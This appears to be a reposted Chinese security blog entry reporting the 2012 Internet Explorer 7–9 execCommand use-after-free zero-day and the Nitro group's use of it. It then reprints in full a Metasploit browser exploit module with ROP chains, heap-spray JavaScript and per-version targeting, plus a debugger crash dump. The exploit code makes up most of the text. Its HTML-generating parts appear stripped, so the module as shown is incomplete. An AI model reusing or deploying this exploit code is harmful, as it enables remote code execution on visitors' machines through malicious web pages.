IE7/8/9 零日漏洞(附Exploit)
- 发表于
- Vulndb
Metasploit制造商HD Moore建议用户停用IE7、IE8和IE9,直到微软修复关键漏洞。
安全专家称,攻击者正在利用微软IE浏览器中的一个“零日”漏洞来攻击访问恶意或被感染的网站的Windows电脑。
微软称正在调查该漏洞的报告,但还没有确定修复该漏洞的时间表。
安全公司Rapid 7表示,IE7、IE8和IE9中未修复的漏洞可以在Windows XP、Vista和Windows 7中被利用,Rapid 7也负责维护开源Metasploit渗透测试工具包。
Rapid 7要求IE用户暂停使用该浏览器,转而使用其他浏览器。
Rapid 7公司在其Metasploit博客中写道:“由于微软目前还没有发布这个漏洞的补丁,我们强烈建议用户在安全更新发布之前,改用其他浏览器,例如谷歌的Chrome或者Mozilla的Firefox。”
Metasploit贡献者Eric Romang在监测受“Nitro”黑客团伙操作的服务器时,偶然发现了这个IE漏洞,该黑客团伙上个月利用Oracle的Java中的零日漏洞来感染电脑。
Nitro团伙于2011年7月被首次发现,赛门铁克公司表示,该团伙瞄准了数目不详的公司,感染了至少48家企业,其中许多是在化工、高级材料和国防工业行业的公司。
在今年8月的攻击者,该攻击团伙利用了Java中未打补丁的漏洞,迫使Oracle发出紧急安全更新。苹果公司也发布了Java 6的补丁来保护其用户,其OS X Snow Leopard和OS Lion中使用了Java 6.
Windows 8操作系统中的IE 10浏览器是否存在最新的漏洞,或者说攻击者的攻击是否能有效地针对该版本浏览器,我们仍然不清楚。
Rapid 7首先去昂兼Metasploit创造者HD Moore表示,他和他的团队尚未测试Windows 8中的IE 10,不过他们计划尽快进行这个测试。Moore表示:“但我猜它应该可以被利用。”
Moore并不清楚Nitro团伙的责任方,他表示该团伙并不一定来自某个特定国家,还存在其他可能性,“多个团体可能在共享这些零日漏洞,互相传递。”
Moore表示,也有可能托管IE利用代码的Web服务器只是一个倾销地,他指出,监控流氓系统的研究人员发现系统中存储恶意软件。
“也许IE利用漏洞放在该服务器中,因为攻击者已经利用完了,”Moore推测,“隐藏踪迹的方法之一就是,当你做完想做的事情后,让这个利用漏洞广泛分布。”
-----------------------------------
从几个公开的blog里还原到的
详细请点击http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
a
最新IE远程代码执行漏洞Exploit
微软已于今日发布确认公告:
Sep 17th, 2012 - Microsoft releases advisory 2757760:
http://technet.microsoft.com/en-us/security/advisory/2757760
参考资料
IE execCommand fuction Use after free Vulnerability 0day
http://www.hackqing.com/index.asp?FoxNews=605.html
Exploit(仅用于漏洞验证测试,禁止非法使用)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name=> HttpClients::IE,
:ua_minver=> "7.0",
:ua_maxver=> "9.0",
:javascript => true,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
'Description'=> %q{
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
to a use-after-free condition.Please note that this vulnerability has
been exploited in the wild since Sep 14 2012, and there is currently no official
patch for it.
},
'License'=> MSF_LICENSE,
'Author' =>
[
'unknown', # Some secret ninja
'eromang', # First public discovery
'binjo',
'sinn3r',# Metasploit
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'OSVDB', '85532' ],
[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/'],
[ 'URL', 'http://metasploit.com' ]
],
'Payload'=>
{
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions'=>
{
'ExitFunction' => "none",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets'=>
[
[ 'Automatic', {} ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 7 on Windows Vista',{ 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ],
[ 'IE 8 on Windows Vista',{ 'Rop' => :jre,'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 8 on Windows 7',{ 'Rop' => :jre,'Offset' => '0x5f4', 'Random' => false } ],
[ 'IE 9 on Windows 7',{ 'Rop' => :jre,'Offset' => '0x5fc', 'Random' => true } ]
],
'Privileged' => false,
'DisclosureDate' => "Sep 14 2012",# When it was spotted in the wild by eromang
'DefaultTarget'=> 0))
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[1]#IE 7 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[2]#IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3]#IE 7 on Windows Vista
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
return targets[4]#IE 8 on Windows Vista
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
return targets[5]#IE 8 on Windows 7
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6]#IE 9 on Windows 7
else
return nil
end
end
def junk(n=4)
return rand_text_alpha(n).unpack("V")[0].to_i
end
def nop
return make_nops(4).unpack("V")[0].to_i
end
def get_payload(t, cli)
code = payload.encoded
# No rop. Just return the payload.
return code if t['Rop'].nil?
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
stack_pivot = [
0x77c4e393, # RETN
0x77c4e392, # POP EAX # RETN
0x77c15ed5, # XCHG EAX, ESP # RETN
].pack("V*")
rop =
[
0x77C21891,# POP ESI # RETN
0x0c0c0c04,# ESI
0x77c4e392,# POP EAX # RETN
0x77c11120,# <- *&VirtualProtect()
0x77c2e493,# MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77c2dd6c,# XCHG EAX,ESI # ADD [EAX], AL # RETN
0x77c4ec00,# POP EBP # RETN
0x77c35459,# ptr to 'push esp #ret'
0x77c47705,# POP EBX # RETN
exec_size, # EBX
0x77c3ea01,# POP ECX # RETN
0x77c5d000,# W pointer (lpOldProtect) (-> ecx)
0x77c46100,# POP EDI # RETN
0x77c46101,# ROP NOP (-> edi)
0x77c4d680,# POP EDX # RETN
0x00000040,# newProtect (0x40) (-> edx)
0x77c4e392,# POP EAX # RETN
nop, # NOPS (-> eax)
0x77c12df9,# PUSHAD # RETN
].pack("V*")
when :jre
print_status("Using JRE ROP")
exec_size = 0xffffffff - code.length + 1
if t['Random']
stack_pivot = [
0x0c0c0c0c, # 0c0c0c08
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05# XCHG EAX, ESP # RET
].pack("V*")
else
stack_pivot = [
0x7c347f98, # RETN
0x7c347f97, # POP EDX # RETN
0x7c348b05# XCHG EAX, ESP # RET
].pack("V*")
end
rop =
[
0x7c37653d,# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
exec_size, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98,# RETN (ROP NOP)
0x7c3415a2,# JMP [EAX]
0xffffffff,
0x7c376402,# skip 4 bytes
0x7c351e05,# NEG EAX # RETN
0x7c345255,# INC EBX # FPATAN # RETN
0x7c352174,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87,# POP EDX # RETN
0xffffffc0,# Value to negate, will become 0x00000040
0x7c351eb1,# NEG EDX # RETN
0x7c34d201,# POP ECX # RETN
0x7c38b001,# &Writable location
0x7c347f97,# POP EAX # RETN
0x7c37a151,# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81,# PUSHAD # ADD AL,0EF # RETN
0x7c345c30,# ptr to 'push esp #ret '
].pack("V*")
end
code = stack_pivot + rop + code
return code
end
# Spray published by corelanc0d3r
# Exploit writing tutorial part 11 : Heap Spraying Demystified
# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
def get_random_spray(t, js_code, js_nops)
spray = <<-JS
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset_length = #{t['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
JS
return spray
end
def get_spray(t, js_code, js_nops)
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
JS
end
def load_html1(cli, my_target)
p = get_payload(my_target, cli)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
if my_target['Random']
js = get_random_spray(my_target, js_code, js_r_nops)
else
js = get_spray(my_target, js_code, js_nops)
end
js = heaplib(js, {:noobfu => true})
html = <<-EOS
EOS
return html
end
def load_html2
html = %Q|
a
|
return html
end
def this_resource
r = get_resource
return ( r == '/') ? '' : r
end
def on_request_uri(cli, request)
print_status request.headers['User-Agent']
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}")
send_not_found(cli)
return
end
vprint_status("Requesting: #{request.uri}")
if request.uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}")
html = load_html2
elsif request.uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target)
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}")
return
else
send_not_found(cli)
return
end
html = html.gsub(/^\t\t/, '')
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def exploit
@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
super
end
end
=begin
0:008> r
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0 nv up ei pl nz na pe nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07mov eax,dword ptr [edi]ds:0023:0c0c0c08=????????
0:008> u
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07mov eax,dword ptr [edi]
637d4650 57pushedi
637d4651 ff5008calldword ptr [eax+8]
0:008> k
ChildEBP RetAddr
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
=end
编辑评论:
据一些朋友测试,英文版能成功运行,中文版有一些问题,最后说下,0day虽好,切勿拿来做坏事哦~
随着此Oday的公布,估计不少电脑又要成为肉鸡~
原文连接
的情况下转载,若非则不得使用我方内容。